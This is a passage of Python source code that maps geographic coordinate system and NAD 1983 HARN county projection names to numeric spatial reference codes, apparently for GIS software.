'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Feet': 103912, 'NAD_1983_HARN_Adj_WI_Forest_Feet': 103913, 'NAD_1983_HARN_Adj_WI_Grant_Feet': 103914, 'NAD_1983_HARN_Adj_WI_Iowa_Feet': 103915, 'NAD_1983_HARN_Adj_WI_Iron_Feet': 103916, 'NAD_1983_HARN_Adj_WI_Jefferson_Feet': 103917, 'NAD_1983_HARN_Adj_WI_Juneau_Feet': 103918, 'NAD_1983_HARN_Adj_WI_Kenosha_Feet': 103919, 'NAD_1983_HARN_Adj_WI_Kewaunee_Feet': 103920, 'NAD_1983_HARN_Adj_WI_LaCrosse_Feet': 103921, 'NAD_1983_HARN_Adj_WI_Lincoln_Feet': 103922, 'NAD_1983_HARN_Adj_WI_Manitowoc_Feet': 103923, 'NAD_1983_HARN_Adj_WI_Marinette_Feet': 103924, 'NAD_1983_HARN_Adj_WI_Menominee_Feet': 103925, 'NAD_1983_HARN_Adj_WI_Milwaukee_Feet': 103926, 'NAD_1983_HARN_Adj_WI_Oconto_Feet': 103927, 'NAD_1983_HARN_Adj_WI_Outagamie_Feet': 103928, 'NAD_1983_HARN_Adj_WI_Ozaukee_Feet': 103929, 'NAD_1983_HARN_Adj_WI_Polk_Feet': 103930, 'NAD_1983_HARN_Adj_WI_Price_Feet': 103931, 'NAD_1983_HARN_Adj_WI_Racine_Feet': 103932, 'NAD_1983_HARN_Adj_WI_Rock_Feet': 103933, 'NAD_1983_HARN_Adj_WI_Rusk_Feet': 103934, 'NAD_1983_HARN_Adj_WI_St_Croix_Feet': 103935, 'NAD_1983_HARN_Adj_WI_Sauk_Feet': 103936, 'NAD_1983_HARN_Adj_WI_Shawano_Feet': 103937, 'NAD_1983_HARN_Adj_WI_Sheboygan_Feet': 103938, 'NAD_1983_HARN_Adj_WI_Trempealeau_Feet': 103939, 'NAD_1983_HARN_Adj_WI_Washington_Feet': 103940, 'NAD_1983_HARN_Adj_WI_Waukesha_Feet': 103941, 'NAD_1983_HARN_Adj_WI_Waupaca_Feet': 103942, 'NAD_1983_HARN_Adj_WI_Winnebago_Feet': 103943, 'NAD_1983_HARN_Adj_WI_Bayfield_Feet': 103944, 'NAD_1983_HARN_Adj_WI_Burnett_Feet': 103945, 'NAD_1983_HARN_Adj_WI_Chippewa_Feet': 103946, 'NAD_1983_HARN_Adj_WI_Columbia_Feet': 103947, 'NAD_1983_HARN_Adj_WI_Crawford_Feet': 103948, 'NAD_1983_HARN_Adj_WI_Dane_Feet': 103949, 'NAD_1983_HARN_Adj_WI_EauClaire_Feet': 103950, 'NAD_1983_HARN_Adj_WI_Green_Feet': 103951, 'NAD_1983_HARN_Adj_WI_GreenLake_Feet': 103952, 'NAD_1983_HARN_Adj_WI_Jackson_Feet': 103953, 'NAD_1983_HARN_Adj_WI_Lafayette_Feet': 103954, 'NAD_1983_HARN_Adj_WI_Langlade_Feet': 103955, 'NAD_1983_HARN_Adj_WI_Marathon_Feet': 103956, 'NAD_1983_HARN_Adj_WI_Marquette_Feet': 103957, 'NAD_1983_HARN_Adj_WI_Monroe_Feet': 103958, 'NAD_1983_HARN_Adj_WI_Oneida_Feet': 103959, 'NAD_1983_HARN_Adj_WI_Pepin_Feet': 103960, 'NAD_1983_HARN_Adj_WI_Pierce_Feet': 103961, 'NAD_1983_HARN_Adj_WI_Portage_Feet': 103962, 'NAD_1983_HARN_Adj_WI_Richland_Feet': 103963, 'NAD_1983_HARN_Adj_WI_Sawyer_Feet': 103964, 'NAD_1983_HARN_Adj_WI_Taylor_Feet': 103965, 'NAD_1983_HARN_Adj_WI_Vernon_Feet': 103966, 'NAD_1983_HARN_Adj_WI_Vilas_Feet': 103967, 'NAD_1983_HARN_Adj_WI_Walworth_Feet': 103968, 'NAD_1983_HARN_Adj_WI_Washburn_Feet': 103969, 'NAD_1983_HARN_Adj_WI_Waushara_Feet': 103970, 'NAD_1983_HARN_Adj_WI_Wood_Feet': 103971 } class geographic(Projection): _projections = { 'GCS_Airy_1830': 4001, 'GCS_Airy_Modified': 4002, 'GCS_Australian': 4003, 'GCS_Bessel_1841': 4004, 'GCS_Bessel_Modified': 4005, 'GCS_Bessel_Namibia': 4006, 'GCS_Clarke_1858': 4007, 'GCS_Clarke_1866': 4008, 'GCS_Clarke_1866_Michigan': 4009, 'GCS_Clarke_1880_Benoit': 4010, 'GCS_Clarke_1880_IGN': 4011, 'GCS_Clarke_1880_RGS': 4012, 'GCS_Clarke_1880_Arc': 4013, 'GCS_Clarke_1880_SGA': 4014, 'GCS_Everest_Adj_1937': 4015, 'GCS_Everest_def_1967': 4016, 'GCS_Everest_Modified': 4018, 'GCS_GRS_1980': 4019, 'GCS_Helmert_1906': 4020, 'GCS_Indonesian': 4021, 'GCS_International_1924': 4022, 'GCS_International_1967': 4023, 'GCS_Krasovsky_1940': 4024, 'GCS_NWL_9D': 4025, 'GCS_Plessis_1817': 4027, 'GCS_Struve_1860': 4028, 'GCS_War_Office': 4029, 'GCS_GEM_10C': 4031, 'GCS_OSU_86F': 4032, 'GCS_OSU_91A': 4033, 'GCS_Clarke_1880': 4034, 'GCS_Sphere': 4035, 'GCS_GRS_1967': 4036, 'GCS_Everest_1830': 4042, 'GCS_Everest_def_1962': 4044, 'GCS_Everest_def_1975': 4045, 'GCS_Sphere_GRS_1980_Authalic': 4047, 'GCS_Sphere_Clarke_1866_Authalic': 4052, 'GCS_Sphere_International_1924_Authalic': 4053, 'GCS_Hughes_1980': 4054, 'GCS_Greek': 4120, 'GCS_GGRS_1987': 4121, 'GCS_ATS_1977': 4122, 'GCS_KKJ': 4123, 'GCS_RT_1990': 4124, 'GCS_Samboja': 4125, 'GCS_LKS_1994': 4126, 'GCS_Tete': 4127, 'GCS_Madzansua': 4128, 'GCS_Observatario': 4129, 'GCS_Moznet': 4130, 'GCS_Indian_1960': 4131, 'GCS_FD_1958': 4132, 'GCS_Estonia_1992': 4133, 'GCS_PDO_1993': 4134, 'GCS_Old_Hawaiian': 4135, 'GCS_St_Lawrence_Island': 4136, 'GCS_St_Paul_Island': 4137, 'GCS_St_George_Island': 4138, 'GCS_Puerto_Rico': 4139, 'GCS_North_American_1983_CSRS': 4140, 'GCS_Israel': 4141, 'GCS_Locodjo_1965': 4142, 'GCS_Abidjan_1987': 4143, 'GCS_Kalianpur_1937': 4144, 'GCS_Kalianpur_1962': 4145, 'GCS_Kalianpur_1975': 4146, 'GCS_Hanoi_1972': 4147, 'GCS_Hartebeesthoek_1994': 4148, 'GCS_CH1903': 4149, 'GCS_CH1903+': 4150, 'GCS_Swiss_TRF_1995': 4151, 'GCS_North_American_1983_HARN': 4152, 'GCS_Rassadiran': 4153, 'GCS_European_1950_ED77': 4154, 'GCS_Dabola_1981': 4155, 'GCS_S_JTSK': 4156, 'GCS_Mount_Dillon': 4157, 'GCS_Naparima_1955': 4158, 'GCS_European_Libyan_Datum_1979': 4159, 'GCS_Chos_Malal_1914': 4160, 'GCS_Pampa_del_Castillo': 4161, 'GCS_Korean_Datum_1985': 4162, 'GCS_Yemen_NGN_1996': 4163, 'GCS_South_Yemen': 4164, 'GCS_Bissau': 4165, 'GCS_Korean_Datum_1995': 4166, 'GCS_NZGD_2000': 4167, 'GCS_Accra': 4168, 'GCS_American_Samoa_1962': 4169, 'GCS_SIRGAS': 4170, 'GCS_RGF_1993': 4171, 'GCS_POSGAR': 4172, 'GCS_IRENET95': 4173, 'GCS_Sierra_Leone_1924': 4174, 'GCS_Sierra_Leone_1968': 4175, 'GCS_Australian_Antarctic_1998': 4176, 'GCS_Pulkovo_1942_Adj_1983': 4178, 'GCS_Pulkovo_1942_Adj_1958': 4179, 'GCS_Estonia_1997': 4180, 'GCS_Luxembourg_1930': 4181, 'GCS_Azores_Occidental_1939': 4182, 'GCS_Azores_Central_1948': 4183, 'GCS_Azores_Oriental_1940': 4184, 'GCS_Madeira_1936': 4185, 'GCS_OSNI_1952': 4188, 'GCS_REGVEN': 4189, 'GCS_POSGAR_1998': 4190, 'GCS_Albanian_1987': 4191, 'GCS_Douala_1948': 4192, 'GCS_Manoca_1962': 4193, 'GCS_Qornoq_1927': 4194, 'GCS_Scoresbysund_1952': 4195, 'GCS_Ammassalik_1958': 4196, 'GCS_Kousseri': 4198, 'GCS_Egypt_1930': 4199, 'GCS_Pulkovo_1995': 4200, 'GCS_Adindan': 4201, 'GCS_Australian_1966': 4202, 'GCS_Australian_1984': 4203, 'GCS_Ain_el_Abd_1970': 4204, 'GCS_Afgooye': 4205, 'GCS_Agadez': 4206, 'GCS_Lisbon': 4207, 'GCS_Aratu': 4208, 'GCS_Arc_1950': 4209, 'GCS_Arc_1960': 4210, 'GCS_Batavia': 4211, 'GCS_Barbados_1938': 4212, 'GCS_Beduaram': 4213, 'GCS_Beijing_1954': 4214, 'GCS_Belge_1950': 4215, 'GCS_Bermuda_1957': 4216, 'GCS_Bern_1898': 4217, 'GCS_Bogota': 4218, 'GCS_Bukit_Rimpah': 4219, 'GCS_Camacupa': 4220, 'GCS_Campo_Inchauspe': 4221, 'GCS_Cape': 4222, 'GCS_Carthage': 4223, 'GCS_Chua': 4224, 'GCS_Corrego_Alegre': 4225, 'GCS_Cote_d_Ivoire': 4226, 'GCS_Deir_ez_Zor': 4227, 'GCS_Douala': 4228, 'GCS_Egypt_1907': 4229, 'GCS_European_1950': 4230, 'GCS_European_1987': 4231, 'GCS_Fahud': 4232, 'GCS_Gandajika_1970': 4233, 'GCS_Garoua': 4234, 'GCS_Guyane_Francaise': 4235, 'GCS_Hu_Tzu_Shan': 4236, 'GCS_Hungarian_1972': 4237, 'GCS_Indonesian_1974': 4238, 'GCS_Indian_1954': 4239, 'GCS_Indian_1975': 4240, 'GCS_Jamaica_1875': 4241, 'GCS_Jamaica_1969': 4242, 'GCS_Kalianpur_1880': 4243, 'GCS_Kandawala': 4244, 'GCS_Kertau': 4245, 'GCS_Kuwait_Oil_Company': 4246, 'GCS_La_Canoa': 4247, 'GCS_Provisional_S_American_1956': 4248, 'GCS_Lake': 4249, 'GCS_Leigon': 4250, 'GCS_Liberia_1964': 4251, 'GCS_Lome': 4252, 'GCS_Luzon_1911': 4253, 'GCS_Hito_XVIII_1963': 4254, 'GCS_Herat_North': 4255, 'GCS_Mahe_1971': 4256, 'GCS_Makassar': 4257, 'GCS_ETRS_1989': 4258, 'GCS_Malongo_1987': 4259, 'GCS_Manoca': 4260, 'GCS_Merchich': 4261, 'GCS_Massawa': 4262, 'GCS_Minna': 4263, 'GCS_Mhast': 4264, 'GCS_Monte_Mario': 4265, 'GCS_Mporaloko': 4266, 'GCS_North_American_1927': 4267, 'GCS_North_American_Michigan': 4268, 'GCS_North_American_1983': 4269, 'GCS_Nahrwan_1967': 4270, 'GCS_Naparima_1972': 4271, 'GCS_New_Zealand_1949': 4272, 'GCS_NGO_1948': 4273, 'GCS_Datum_73': 4274, 'GCS_NTF': 4275, 'GCS_NSWC_9Z_2': 4276, 'GCS_OSGB_1936': 4277, 'GCS_OSGB_1970_SN': 4278, 'GCS_OS_SN_1980': 4279, 'GCS_Padang_1884': 4280, 'GCS_Palestine_1923': 4281, 'GCS_Pointe_Noire': 4282, 'GCS_GDA_1994': 4283, 'GCS_Pulkovo_1942': 4284, 'GCS_Qatar_1974': 4285, 'GCS_Qatar_1948': 4286, 'GCS_Qornoq': 4287, 'GCS_Loma_Quintana': 4288, 'GCS_Amersfoort': 4289, 'GCS_South_American_1969': 4291, 'GCS_Sapper_Hill_1943': 4292, 'GCS_Schwarzeck': 4293, 'GCS_Segora': 4294, 'GCS_Serindung': 4295, 'GCS_Sudan': 4296, 'GCS_Tananarive_1925': 4297, 'GCS_Timbalai_1948': 4298, 'GCS_TM65': 4299, 'GCS_TM75': 4300, 'GCS_Tokyo': 4301, 'GCS_Trinidad_1903': 4302, 'GCS_Trucial_Coast_1948': 4303, 'GCS_Voirol_1875': 4304, 'GCS_Voirol_Unifie_1960': 4305, 'GCS_Bern_1938': 4306, 'GCS_Nord_Sahara_1959': 4307, 'GCS_RT38': 4308, 'GCS_Yacare': 4309, 'GCS_Yoff': 4310, 'GCS_Zanderij': 4311, 'GCS_MGI': 4312, 'GCS_Belge_1972': 4313, 'GCS_Deutsches_Hauptdreiecksnetz': 4314, 'GCS_Conakry_1905': 4315, 'GCS_Dealul_Piscului_1933': 4316, 'GCS_Dealul_Piscului_1970': 4317, 'GCS_NGN': 4318, 'GCS_KUDAMS': 4319, 'GCS_WGS_1972': 4322, 'GCS_WGS_1972_BE': 4324, 'GCS_WGS_1984': 4326, 'GCS_Montserrat_1958': 4404, 'GCS_Anguilla_1957': 4600, 'GCS_Antigua_1943': 4601, 'GCS_Dominica_1945': 4602, 'GCS_Grenada_1953': 4603, 'GCS_St_Kitts_1955': 4605, 'GCS_St_Lucia_1955': 4606, 'GCS_St_Vincent_1945': 4607, 'GCS_NAD_1927_Definition_1976': 4608, 'GCS_NAD_1927_CGQ77': 4609, 'GCS_Xian_1980': 4610, 'GCS_Hong_Kong_1980': 4611, 'GCS_JGD_2000': 4612, 'GCS_Gunung_Segara': 4613, 'GCS_QND_1995': 4614, 'GCS_Porto_Santo_1936': 4615, 'GCS_Selvagem_Grande_1938': 4616, 'GCS_North_American_1983_CSRS': 4617, 'GCS_South_American_1969': 4618, 'GCS_SWEREF99': 4619, 'GCS_Point_58': 4620, 'GCS_Fort_Marigot': 4621, 'GCS_Sainte_Anne': 4622, 'GCS_CSG_1967': 4623, 'GCS_RGFG_1995': 4624, 'GCS_Fort_Desaix': 4625, 'GCS_Reunion_1947': 4626, 'GCS_RGR_1992': 4627, 'GCS_Tahiti_1952': 4628, 'GCS_Tahaa_1954': 4629, 'GCS_IGN72_Nuku_Hiva': 4630, 'GCS_K0_1949': 4631, 'GCS_Combani_1950': 4632, 'GCS_IGN56_Lifou': 4633, 'GCS_Petrels_1972': 4636, 'GCS_Pointe_Geologie_Perroud_1950': 4637, 'GCS_Saint_Pierre_et_Miquelon_1950': 4638, 'GCS_MOP78': 4639, 'GCS_RRAF_1991': 4640, 'GCS_IGN53_Mare': 4641, 'GCS_ST84_Ile_des_Pins': 4642, 'GCS_ST71_Belep': 4643, 'GCS_NEA74_Noumea': 4644, 'GCS_RGNC_1991': 4645, 'GCS_Grand_Comoros': 4646, 'GCS_Reykjavik_1900': 4657, 'GCS_Hjorsey_1955': 4658, 'GCS_ISN_1993': 4659, 'GCS_Helle_1954': 4660, 'GCS_LKS_1992': 4661, 'GCS_IGN72_Grande_Terre': 4662, 'GCS_Porto_Santo_1995': 4663, 'GCS_Azores_Oriental_1995': 4664, 'GCS_Azores_Central_1995': 4665, 'GCS_Lisbon_1890': 4666, 'GCS_IKBD_1992': 4667, 'GCS_European_1979': 4668, 'GCS_LKS_1994': 4669, 'GCS_IGM_1995': 4670, 'GCS_Voirol_1879': 4671, 'GCS_Chatham_Island_1971': 4672, 'GCS_Chatham_Islands_1979': 4673, 'GCS_SIRGAS_2000': 4674, 'GCS_Guam_1963': 4675, 'GCS_Vientiane_1982': 4676, 'GCS_Lao_1993': 4677, 'GCS_Lao_1997': 4678, 'GCS_Jouik_1961': 4679, 'GCS_Nouakchott_1965': 4680, 'GCS_Gulshan_303': 4682, 'GCS_PRS_1992': 4683, 'GCS_Gan_1970': 4684, 'GCS_MAGNA': 4686, 'GCS_RGPF': 4687, 'GCS_Fatu_Iva_1972': 4688, 'GCS_IGN63_Hiva_Oa': 4689, 'GCS_Tahiti_1979': 4690, 'GCS_Moorea_1987': 4691, 'GCS_Maupiti_1983': 4692, 'GCS_Nakhl-e_Ghanem': 4693, 'GCS_POSGAR_1994': 4694, 'GCS_Katanga_1955': 4695, 'GCS_Kasai_1955': 4696, 'GCS_IGC_1962_6th_Parallel_South': 4697, 'GCS_Kerguelen_Island_1949': 4698, 'GCS_Le_Pouce_1934': 4699, 'GCS_IGN_Astro_1960': 4700, 'GCS_IGCB_1955': 4701, 'GCS_Mauritania_1999': 4702, 'GCS_Mhast_1951': 4703, 'GCS_Mhast_Onshore': 4704, 'GCS_Mhast_Offshore': 4705, 'GCS_Egypt_Gulf_of_Suez_S-650_TL': 4706, 'GCS_Tern_Island_1961': 4707, 'GCS_Anna_1_1965': 4708, 'GCS_Beacon_E_1945': 4709, 'GCS_DOS_71_4': 4710, 'GCS_Astro_1952': 4711, 'GCS_Ascension_Island_1958': 4712, 'GCS_Ayabelle': 4713, 'GCS_Bellevue_IGN': 4714, 'GCS_Camp_Area': 4715, 'GCS_Canton_1966': 4716, 'GCS_Cape_Canaveral': 4717, 'GCS_Solomon_1968': 4718, 'GCS_Easter_Island_1967': 4719, 'GCS_Fiji_1986': 4720, 'GCS_Fiji_1956': 4721, 'GCS_ISTS_061_1968': 4722, 'GCS_Grand_Cayman_1959': 4723, 'GCS_ISTS_073_1969': 4724, 'GCS_Johnston_Island_1961': 4725, 'GCS_Little_Cayman_1961': 4726, 'GCS_Midway_1961': 4727, 'GCS_Pico_de_Las_Nieves': 4728, 'GCS_Pitcairn_1967': 4729, 'GCS_Santo_DOS_1965': 4730, 'GCS_Viti_Levu_1916': 4731, 'GCS_Wake_Eniwetok_1960': 4732, 'GCS_Wake_Island_1952': 4733, 'GCS_Tristan_1968': 4734, 'GCS_Kusaie_1951': 4735, 'GCS_Deception_Island': 4736, 'GCS_Korea_2000': 4737, 'GCS_Hong_Kong_1963': 4738, 'GCS_Hong_Kong_1963_67': 4739, 'GCS_PZ_1990': 4740, 'GCS_FD_1954': 4741, 'GCS_GDM_2000': 4742, 'GCS_Karbala_1979_Polservice': 4743, 'GCS_Nahrwan_1934': 4744, 'GCS_RD/83': 4745, 'GCS_PD/83': 4746, 'GCS_Greenland_1996': 4747, 'GCS_Vanua_Levu_1915': 4748, 'GCS_RGNC_1991-93': 4749, 'GCS_ST87_Ouvea': 4750, 'GCS_fk89': 4753, 'GCS_LGD2006': 4754, 'GCS_DGN_1995': 4755, 'GCS_VN_2000': 4756, 'GCS_SVY21': 4757, 'GCS_JAD_2001': 4758, 'GCS_NAD_1983_NSRS2007': 4759, 'GCS_WGS_1966': 4760, 'GCS_Bern_1898_Bern': 4801, 'GCS_Bogota_Bogota': 4802, 'GCS_Lisbon_Lisbon': 4803, 'GCS_Makassar_Jakarta': 4804, 'GCS_MGI_Ferro': 4805, 'GCS_Monte_Mario_Rome': 4806, 'GCS_NTF_Paris': 4807, 'GCS_Padang_1884_Jakarta': 4808, 'GCS_Belge_1950_Brussels': 4809, 'GCS_Tananarive_1925_Paris': 4810, 'GCS_Voirol_1875_Paris': 4811, 'GCS_Voirol_Unifie_1960_Paris': 4812, 'GCS_Batavia_Jakarta': 4813, 'GCS_RT38_Stockholm': 4814, 'GCS_Greek_Athens': 4815, 'GCS_Carthage_Paris': 4816, 'GCS_NGO_1948_Oslo': 4817, 'GCS_S_JTSK_Ferro': 4818, 'GCS_Nord_Sahara_1959_Paris': 4819, 'GCS_Gunung_Segara_Jakarta': 4820, 'GCS_Voirol_1879_Paris': 4821, 'GCS_ITRF_2005': 4896, 'GCS_ATF_Paris': 4901, 'GCS_Nord_de_Guerre_Paris': 4902, 'GCS_Madrid_1870_Madrid': 4903, 'GCS_Lisbon_1890_Lisbon': 4904, 'GCS_WGS_1966': 37001, 'GCS_Fischer_1960': 37002, 'GCS_Fischer_1968': 37003, 'GCS_Fischer_Modified': 37004, 'GCS_Hough_1960': 37005, 'GCS_Everest_Modified_1969': 37006, 'GCS_Walbeck': 37007, 'GCS_Sphere_ARC_INFO': 37008, 'GCS_European_1979': 37201, 'GCS_Everest_Bangladesh': 37202, 'GCS_Everest_India_Nepal': 37203, 'GCS_Hjorsey_1955': 37204, 'GCS_Hong_Kong_1963_67': 37205, 'GCS_Oman': 37206, 'GCS_South_Asia_Singapore': 37207, 'GCS_Ayabelle': 37208, 'GCS_Point_58': 37211, 'GCS_Beacon_E_1945': 37212, 'GCS_Tern_Island_1961': 37213, 'GCS_Astro_1952': 37214, 'GCS_Bellevue_IGN': 37215, 'GCS_Canton_1966': 37216, 'GCS_Chatham_Island_1971': 37217, 'GCS_DOS_1968': 37218, 'GCS_Easter_Island_1967': 37219, 'GCS_Guam_1963': 37220, 'GCS_GUX_1': 37221, 'GCS_Johnston_Island_1961': 37222, 'GCS_Carthage_Degree': 37223, 'GCS_Midway_1961': 37224, 'GCS_Pitcairn_1967': 37226, 'GCS_Santo_DOS_1965': 37227, 'GCS_Viti_Levu_1916': 37228, 'GCS_Wake_Eniwetok_1960': 37229, 'GCS_Wake_Island_1952': 37230, 'GCS_Anna_1_1965': 37231, 'GCS_Gan_1970': 37232, 'GCS_ISTS_073_1969': 37233, 'GCS_Kerguelen_Island_1949': 37234, 'GCS_Reunion_1947': 37235, 'GCS_Ascension_Island_1958': 37237, 'GCS_DOS_71_4': 37238, 'GCS_Cape_Canaveral': 37239, 'GCS_Fort_Thomas_1955': 37240, 'GCS_Graciosa_Base_SW_1948': 37241, 'GCS_ISTS_061_1968': 37242, 'GCS_LC5_1961': 37243, 'GCS_Observ_Meteorologico_1939': 37245, 'GCS_Pico_de_Las_Nieves': 37246, 'GCS_Porto_Santo_1936': 37247, 'GCS_Sao_Braz': 37249, 'GCS_Selvagem_Grande_1938': 37250, 'GCS_Tristan_1968': 37251, 'GCS_American_Samoa_1962': 37252, 'GCS_Camp_Area': 37253, 'GCS_Deception_Island': 37254, 'GCS_Gunung_Segara': 37255, 'GCS_S42_Hungary': 37257, 'GCS_Kusaie_1951': 37259, 'GCS_Alaskan_Islands': 37260, 'GCS_Assumed_Geographic_1': 104000, 'GCS_Estonia_1937': 104101, 'GCS_Hermannskogel': 104102, 'GCS_Sierra_Leone_1960': 104103, 'GCS_Hong_Kong_1980': 104104, 'GCS_Datum_Lisboa_Bessel': 104105, 'GCS_Datum_Lisboa_Hayford': 104106, 'GCS_RGF_1993': 104107, 'GCS_NZGD_2000': 104108, 'GCS_Pohnpei': 104109, 'GCS_REGVEN': 104110, 'GCS_JGD_2000': 104111, 'GCS_Bab_South': 104112, 'GCS_Majuro': 104113, 'GCS_Bermuda_2000': 104114, 'GCS_ITRF_1988': 104115, 'GCS_ITRF_1989': 104116, 'GCS_ITRF_1990': 104117, 'GCS_ITRF_1991': 104118, 'GCS_ITRF_1992': 104119, 'GCS_ITRF_1993': 104120, 'GCS_ITRF_1994': 104121, 'GCS_ITRF_1996': 104122, 'GCS_ITRF_1997': 104123, 'GCS_ITRF_2000': 104124, 'GCS_Chatham_Islands_1979': 104125, 'GCS_Observatorio_Meteorologico_1965': 104126, 'GCS_Roma_1940': 104127, 'GCS_Sphere_EMEP': 104128, 'GCS_EUREF_FIN': 104129, 'GCS_Jordan': 104130, 'GCS_D48': 104131, 'GCS_Ocotepeque_1935': 104132, 'GCS_JAD_2001': 104133, 'GCS_MONREF_1997': 104134, 'GCS_MSK_1942': 104135, 'GCS_TWD_1967': 104136, 'GCS_TWD_1997': 104137, 'GCS_WGS_1984_Major_Auxiliary_Sphere': 104199, 'GCS_ETRF_1989': 104258, 'GCS_Merchich_Degree': 104261, 'GCS_Voirol_1875_Degree': 104304, 'GCS_Voirol_Unifie_1960_Degree': 104305, 'GCS_NAD_1983_HARN_Adj_MN_Anoka': 104700, 'GCS_NAD_1983_HARN_Adj_MN_Becker': 104701, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_North': 104702, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_South': 104703, 'GCS_NAD_1983_HARN_Adj_MN_Benton': 104704, 'GCS_NAD_1983_HARN_Adj_MN_Big_Stone': 104705, 'GCS_NAD_1983_HARN_Adj_MN_Blue_Earth': 104706, 'GCS_NAD_1983_HARN_Adj_MN_Brown': 104707, 'GCS_NAD_1983_HARN_Adj_MN_Carlton': 104708, 'GCS_NAD_1983_HARN_Adj_MN_Carver': 104709, 'GCS_NAD_1983_HARN_Adj_MN_Cass_North': 104710, 'GCS_NAD_1983_HARN_Adj_MN_Cass_South': 104711, 'GCS_NAD_1983_HARN_Adj_MN_Chippewa': 104712, 'GCS_NAD_1983_HARN_Adj_MN_Chisago': 104713, 'GCS_NAD_1983_HARN_Adj_MN_Cook_North': 104714, 'GCS_NAD_1983_HARN_Adj_MN_Cook_South': 104715, 'GCS_NAD_1983_HARN_Adj_MN_Cottonwood': 104716, 'GCS_NAD_1983_HARN_Adj_MN_Crow_Wing': 104717, 'GCS_NAD_1983_HARN_Adj_MN_Dakota': 104718, 'GCS_NAD_1983_HARN_Adj_MN_Dodge': 104719, 'GCS_NAD_1983_HARN_Adj_MN_Douglas': 104720, 'GCS_NAD_1983_HARN_Adj_MN_Faribault': 104721, 'GCS_NAD_1983_HARN_Adj_MN_Fillmore': 104722, 'GCS_NAD_1983_HARN_Adj_MN_Freeborn': 104723, 'GCS_NAD_1983_HARN_Adj_MN_Goodhue': 104724, 'GCS_NAD_1983_HARN_Adj_MN_Grant': 104725, 'GCS_NAD_1983_HARN_Adj_MN_Hennepin': 104726, 'GCS_NAD_1983_HARN_Adj_MN_Houston': 104727, 'GCS_NAD_1983_HARN_Adj_MN_Isanti': 104728, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_North': 104729, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_South': 104730, 'GCS_NAD_1983_HARN_Adj_MN_Jackson': 104731, 'GCS_NAD_1983_HARN_Adj_MN_Kanabec': 104732, 'GCS_NAD_1983_HARN_Adj_MN_Kandiyohi': 104733, 'GCS_NAD_1983_HARN_Adj_MN_Kittson': 104734, 'GCS_NAD_1983_HARN_Adj_MN_Koochiching': 104735, 'GCS_NAD_1983_HARN_Adj_MN_Lac_Qui_Parle': 104736, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North': 104737, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South': 104738, 'GCS_NAD_1983_HARN_Adj_MN_Le_Sueur': 104739, 'GCS_NAD_1983_HARN_Adj_MN_Lincoln': 104740, 'GCS_NAD_1983_HARN_Adj_MN_Lyon': 104741, 'GCS_NAD_1983_HARN_Adj_MN_McLeod': 104742, 'GCS_NAD_1983_HARN_Adj_MN_Mahnomen': 104743, 'GCS_NAD_1983_HARN_Adj_MN_Marshall': 104744, 'GCS_NAD_1983_HARN_Adj_MN_Martin': 104745, 'GCS_NAD_1983_HARN_Adj_MN_Meeker': 104746, 'GCS_NAD_1983_HARN_Adj_MN_Morrison': 104747, 'GCS_NAD_1983_HARN_Adj_MN_Mower': 104748, 'GCS_NAD_1983_HARN_Adj_MN_Murray': 104749, 'GCS_NAD_1983_HARN_Adj_MN_Nicollet': 104750, 'GCS_NAD_1983_HARN_Adj_MN_Nobles': 104751, 'GCS_NAD_1983_HARN_Adj_MN_Norman': 104752, 'GCS_NAD_1983_HARN_Adj_MN_Olmsted': 104753, 'GCS_NAD_1983_HARN_Adj_MN_Ottertail': 104754, 'GCS_NAD_1983_HARN_Adj_MN_Pennington': 104755, 'GCS_NAD_1983_HARN_Adj_MN_Pine': 104756, 'GCS_NAD_1983_HARN_Adj_MN_Pipestone': 104757, 'GCS_NAD_1983_HARN_Adj_MN_Polk': 104758, 'GCS_NAD_1983_HARN_Adj_MN_Pope': 104759, 'GCS_NAD_1983_HARN_Adj_MN_Ramsey': 104760, 'GCS_NAD_1983_HARN_Adj_MN_Red_Lake': 104761, 'GCS_NAD_1983_HARN_Adj_MN_Redwood': 104762, 'GCS_NAD_1983_HARN_Adj_MN_Renville': 104763, 'GCS_NAD_1983_HARN_Adj_MN_Rice': 104764, 'GCS_NAD_1983_HARN_Adj_MN_Rock': 104765, 'GCS_NAD_1983_HARN_Adj_MN_Roseau': 104766, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_North': 104767, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_Central': 104768, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_South': 104769, 'GCS_NAD_1983_HARN_Adj_MN_Scott': 104770, 'GCS_NAD_1983_HARN_Adj_MN_Sherburne': 104771, 'GCS_NAD_1983_HARN_Adj_MN_Sibley': 104772, 'GCS_NAD_1983_HARN_Adj_MN_Stearns': 104773, 'GCS_NAD_1983_HARN_Adj_MN_Steele': 104774, 'GCS_NAD_1983_HARN_Adj_MN_Stevens': 104775, 'GCS_NAD_1983_HARN_Adj_MN_Swift': 104776, 'GCS_NAD_1983_HARN_Adj_MN_Todd': 104777, 'GCS_NAD_1983_HARN_Adj_MN_Traverse': 104778, 'GCS_NAD_1983_HARN_Adj_MN_Wabasha': 104779, 'GCS_NAD_1983_HARN_Adj_MN_Wadena': 104780, 'GCS_NAD_1983_HARN_Adj_MN_Waseca': 104781, 'GCS_NAD_1983_HARN_Adj_MN_Watonwan': 104782, 'GCS_NAD_1983_HARN_Adj_MN_Winona': 104783, 'GCS_NAD_1983_HARN_Adj_MN_Wright': 104784, 'GCS_NAD_1983_HARN_Adj_MN_Yellow_Medicine': 104785, 'GCS_NAD_1983_HARN_Adj_WI_Adams': 104800, 'GCS_NAD_1983_HARN_Adj_WI_Ashland': 104801, 'GCS_NAD_1983_HARN_Adj_WI_Barron': 104802, 'GCS_NAD_1983_HARN_Adj_WI_Bayfield': 104803, 'GCS_NAD_1983_HARN_Adj_WI_Brown': 104804, 'GCS_NAD_1983_HARN_Adj_WI_Buffalo': 104805, 'GCS_NAD_1983_HARN_Adj_WI_Burnett': 104806, 'GCS_NAD_1983_HARN_Adj_WI_Calumet': 104807, 'GCS_NAD_1983_HARN_Adj_WI_Chippewa': 104808, 'GCS_NAD_1983_HARN_Adj_WI_Clark': 104809, 'GCS_NAD_1983_HARN_Adj_WI_Columbia': 104810, 'GCS_NAD_1983_HARN_Adj_WI_Crawford': 104811, 